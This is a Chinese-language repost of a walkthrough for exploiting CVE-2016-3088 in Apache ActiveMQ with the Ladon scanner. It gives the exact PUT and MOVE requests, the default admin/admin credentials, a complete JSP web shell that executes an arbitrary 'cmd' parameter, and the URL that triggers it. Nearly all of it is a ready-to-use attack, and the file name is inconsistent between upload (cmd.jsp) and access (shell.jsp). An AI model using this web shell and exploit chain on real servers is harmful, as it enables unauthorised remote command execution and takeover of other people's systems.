Ladon插件生成器之CVE-2016-3088 ActiveMQ GetShell Exploit


前言

使用Exp生成器生成Ladon插件實戰,CVE-2016-3088 ActiveMQ GetShell

0x000 漏洞信息

漏洞編號: CVE-2016-3088

漏洞原理: ActiveMQ 中的 FileServer 服務允許用戶通過 PUT/MOVE方法上傳文件到指定目錄

影響版本: Apache ActiveMQ 5.0.0 – 5.13.2

0x001 獲取路徑

PUT /fileserver/%20/%20

0x002 上傳shell

上傳和移動文件需登陸,默認帳密admin/admin,將以下代碼雙引號進行轉義(原本是轉義好的被github過濾了)

PUT

AddUrl: /fileserver/cmd.jsp

PUTData: <%@ page import="java.io.*"%><%out.print("Hello");String strcmd = request.getParameter("cmd");String line =null;Process p=Runtime.getRuntime().exec(strcmd);InputStream is = p.getInputStream();BufferedReader br = new BufferedReader(new InputStreamReader(is));while((line =br.readLine())!=null){out.print(line+"");}%>

Authorization: admin:admin

0x003 移動shell

根目錄和fileserver均不解析JSP文件,好在admin和api目錄可以解析

MOVE

AddUrl: /fileserver/cmd.jsp

Destination: file://C:/Users/null/Desktop/apache-activemq-5.9.0/webapps/admin/cmd.jsp

0x004 Cscan調用

0x005 連接shell

訪問http://192.168.1.26:8161/admin/shell.jsp?cmd=whoami

0x006 視頻教程

Video1: K8Cscan Apache ActiveMQ GetShell CVE-2016-3088

Video2: WhatCMS指紋識別內網ActiveMQ&GetShell


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM